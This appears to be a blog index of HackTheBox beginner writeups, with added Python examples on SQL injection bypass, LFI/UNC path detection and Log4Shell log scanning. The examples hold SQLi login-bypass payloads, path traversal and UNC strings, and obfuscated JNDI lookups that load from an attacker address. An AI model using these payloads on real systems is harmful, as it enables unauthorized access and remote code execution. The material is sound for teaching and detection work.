appointment

Appointment

A deceptively simple box that proves sometimes the oldest tricks in the book are the most effective. Appointment is a single-page web challenge centered entirely on a PHP login form vulnerable to SQL injection authentication bypass — no rabbit holes, no pivoting, just clean exploitation of a classic vulnerability.

Overview

Appointment runs a bare-bones Apache web server with a PHP login form as its only attack surface. The goal is straightforward: bypass authentication using SQL injection to retrieve the flag. It’s a great box for internalizing why SQL injection works, not just how to use it. ...
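The Appointment summary above describes the classic authentication bypass without showing the mechanics. The following is an added example (not code from the writeup or the box) that reproduces the vulnerable pattern against a constructed in-memory SQLite table and contrasts it with the parameterized form. The table layout, the `admin` / `supersecret` row and the plaintext password column are assumptions for the demo; the two payloads are the textbook comment-out and tautology bypasses.

```python
import sqlite3

# Constructed stand-in for the box's backend database: one admin row with a
# plaintext password (an assumption for the demo, not a claim about the box).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'supersecret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Mirrors the classic PHP pattern: user input concatenated into the query
    string, so quotes and comment markers in the input become SQL syntax."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Same query, parameterized: the driver binds the values, so the input is
    never parsed as SQL no matter what characters it contains."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# Two textbook bypass payloads. "admin'-- -" closes the username literal and
# comments out the password check; "' OR 1=1-- -" makes the WHERE clause true
# for every row, so the first user (here admin) comes back.
PAYLOADS = ["admin'-- -", "' OR 1=1-- -"]

def demo():
    """Return {payload: (vulnerable_result, parameterized_result)}."""
    conn = make_db()
    results = {}
    for p in PAYLOADS:
        results[p] = (login_vulnerable(conn, p, "wrong"),
                      login_safe(conn, p, "wrong"))
    return results

if __name__ == "__main__":
    for payload, (vuln, safe) in demo().items():
        print(f"{payload!r:20} vulnerable -> {vuln!r:8} parameterized -> {safe!r}")
```

The point worth internalizing is the second column: the same payload that logs in as `admin` against the concatenated query returns nothing against the bound one, because the database engine never sees the quote or the `--` as syntax.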

February 1, 2026 · 4 min · Logan Dawson

crocodile

Crocodile — HackTheBox Writeup

Crocodile is a very easy Linux box that demonstrates how anonymous FTP access can expose credentials that unlock a web application login. The attack chain is short but teaches a fundamental methodology: always enumerate every open service, because sensitive information on one port can become your key into another.

Reconnaissance

I started with a service-version scan to understand what was running on the target: nmap -sV -sC <TARGET> ...

February 1, 2026 · 3 min · Logan Dawson

responder

Responder — HackTheBox Writeup

Responder is a Very Easy Windows box that chains a classic Local File Inclusion vulnerability with NTLM hash capture to gain a foothold via WinRM. It’s an excellent introduction to how Windows authentication can be weaponized against itself when a server blindly follows UNC paths.

Overview

The attack path here is beautifully simple once you see it: a PHP web application has an LFI vulnerability in its language selector, Windows will attempt NTLM authentication when it tries to access a UNC path, and we’re sitting there with Responder ready to catch the hash. Crack the hash, log in over WinRM, read the flag. Along the way I hit a firewall issue that was a useful reminder about VPN interface trust zones — more on that later. ...
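The Responder summary above hinges on one detail: a language selector that hands the request parameter straight to the file loader, so a `\\host\share` UNC path is followed and the server authenticates outbound. The following added example (not the writeup's or the application's code) shows the unvalidated lookup beside an allowlist version, and runs a small detector over constructed Apache-style access-log lines to flag traversal, wrapper and UNC values in the `page` parameter. The `LANGUAGES` map, the `page` parameter name and the log lines are all assumptions for the demo.

```python
import re
from urllib.parse import urlparse, parse_qs

# Language files the application legitimately serves. The names are assumptions
# for this example, not the real box's file names.
LANGUAGES = {"en": "english.html", "fr": "french.html", "de": "german.html"}

def resolve_language_vulnerable(page):
    """The LFI pattern: the request parameter becomes the include path unchanged,
    so ../ traversal, php:// wrappers and \\\\host\\share UNC paths all pass
    through. On Windows a UNC path makes the server authenticate outbound
    with NTLM, which is what Responder captures."""
    return page

def resolve_language_hardened(page):
    """Map a short key onto a fixed file name; anything not in the allowlist is
    rejected rather than sanitized."""
    return LANGUAGES.get(page)

LFI_PATTERNS = [
    re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)"),   # ../ or ..\ traversal
    re.compile(r"^(?:\\\\|//)[^\\/]+[\\/]"),     # \\host\share UNC path
    re.compile(r"^[a-z][a-z0-9+.-]*://", re.I),  # php://, file://, http:// wrappers
    re.compile(r"^[a-zA-Z]:[\\/]"),              # C:\ absolute Windows path
]

def is_lfi_attempt(value):
    return any(p.search(value) for p in LFI_PATTERNS)

def flagged_pages(log_lines):
    """Pull the 'page' parameter out of Apache-style access-log lines and return
    the values that look like LFI/UNC attempts, in log order."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        for page in parse_qs(urlparse(m.group(1)).query).get("page", []):
            if is_lfi_attempt(page):
                hits.append(page)
    return hits

# Constructed access-log lines for the demo (not captured from the box).
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Feb/2026:09:00:00 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 -',
    '10.10.14.5 - - [01/Feb/2026:09:00:10 +0000] "GET /index.php?page=../../../../windows/win.ini HTTP/1.1" 200 -',
    '10.10.14.5 - - [01/Feb/2026:09:00:20 +0000] "GET /index.php?page=%5C%5C10.10.14.5%5Cshare HTTP/1.1" 200 -',
    '10.10.14.5 - - [01/Feb/2026:09:00:30 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for page in flagged_pages(SAMPLE_LOG):
        print(f"flagged: {page!r}  vulnerable include -> {resolve_language_vulnerable(page)!r}"
              f"  hardened -> {resolve_language_hardened(page)!r}")
```

The allowlist is the fix, not a blocklist: the patterns in `LFI_PATTERNS` are useful for spotting attempts in logs after the fact, but an include path built from a short key can never reach a share or a wrapper in the first place.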

February 1, 2026 · 5 min · Logan Dawson

sequel

Sequel

Sometimes the simplest misconfiguration is the most damaging. Sequel is a very easy Linux box that exposes a MariaDB instance with no root password — no exploits required, just knowing to try the door before assuming it’s locked.

Overview

This box runs a single service: MySQL/MariaDB on port 3306. The entire challenge is recognizing that the database accepts unauthenticated connections as root, then methodically enumerating databases and tables until you find the flag. It’s a great introduction to database enumeration methodology and a real-world reminder of how often default or missing credentials appear in the wild. ...

February 1, 2026 · 3 min · Logan Dawson

unified

Unified — Log4Shell to Root via MongoDB Hash Swap

Unified is a Very Easy Linux box that demonstrates one of the most impactful vulnerabilities in recent memory: Log4Shell (CVE-2021-44228). The box runs a vulnerable version of UniFi Network Controller, and exploitation chains together a JNDI injection for initial access with an unauthenticated MongoDB instance to escalate all the way to root.

Reconnaissance

I started with an automated Nmap scan to get a picture of what was running on the box. ...
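The Unified summary above names the JNDI injection at the heart of Log4Shell. What a defender most needs from that is the ability to recognize the lookup in logs, including the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:UNSET:-j}`) that attackers use to hide the literal `jndi`. The following added example (not the writeup's code and not UniFi's) collapses those lookups the way Log4j evaluates them and runs the check over constructed Apache-style log lines; the log format, the User-Agent as carrier and the addresses are assumptions for the demo.

```python
import re

# Log4j lookups attackers nest to hide the literal string "jndi" from naive
# matching. ${lower:j} / ${upper:J} evaluate to the letter; ${::-j} and
# ${env:UNSET:-j} evaluate to the default value that follows ":-".
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)

def deobfuscate(text, max_rounds=10):
    """Collapse nested case/default lookups innermost-first until stable.
    ${upper:X} is replaced by X as written; the final check is case-insensitive,
    so the letter case does not matter for detection."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(r"\1", text)
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text

def is_log4shell(text):
    return bool(_JNDI.search(deobfuscate(text)))

def scan(lines):
    """Return (line index, normalized line) for each line carrying a JNDI lookup."""
    return [(i, deobfuscate(line)) for i, line in enumerate(lines) if is_log4shell(line)]

# Constructed log lines for the demo (not captured from the box). Lines 0-2
# carry a plain, a case-lookup-obfuscated and a default-lookup-obfuscated
# payload; lines 3-4 are benign, the last one deliberately containing a
# non-JNDI lookup.
SAMPLE_LOG = [
    '10.10.14.3 - - [31/Jan/2026:10:00:00 +0000] "GET /manage/login HTTP/1.1" 200 "-" '
    '"${jndi:ldap://10.10.14.3:1389/o=tomcat}"',
    '10.10.14.3 - - [31/Jan/2026:10:00:05 +0000] "GET /manage/login HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://10.10.14.3:1389/a}"',
    '10.10.14.3 - - [31/Jan/2026:10:00:09 +0000] "GET /manage/login HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://10.10.14.3:1099/x}"',
    '10.10.14.3 - - [31/Jan/2026:10:01:00 +0000] "GET /manage/login HTTP/1.1" 200 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.3 - - [31/Jan/2026:10:01:30 +0000] "GET /manage/login HTTP/1.1" 200 "-" '
    '"${sys:os.name}"',
]

if __name__ == "__main__":
    for i, normalized in scan(SAMPLE_LOG):
        print(f"line {i}: {normalized}")
```

A plain `grep jndi` catches only the first of the three malicious lines; normalizing the lookups first is what makes the other two visible, and the same trick applies to any field the application logs, not just the User-Agent used here.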

January 31, 2026 · 5 min · Logan Dawson

vaccine

Vaccine — HackTheBox Writeup

Vaccine is a Very Easy Linux box that chains together several classic web exploitation techniques: anonymous FTP access, zip cracking, hardcoded credentials, SQL injection, and a sudo misconfiguration that hands over root in seconds. Each step feeds directly into the next, making it an excellent box for learning how a real attack chain flows from initial recon to full compromise.

Overview

| Field | Value |
| --- | --- |
| IP | |
| OS | Linux (Ubuntu 20.04) |
| Difficulty | Very Easy |

Reconnaissance

Port Scan

I always start with a service/version scan using Nmap’s default scripts (-sC) alongside version detection (-sV). Treating the target as if ICMP is blocked from the start (-Pn) saves frustration on boxes that don’t respond to ping. ...

January 31, 2026 · 5 min · Logan Dawson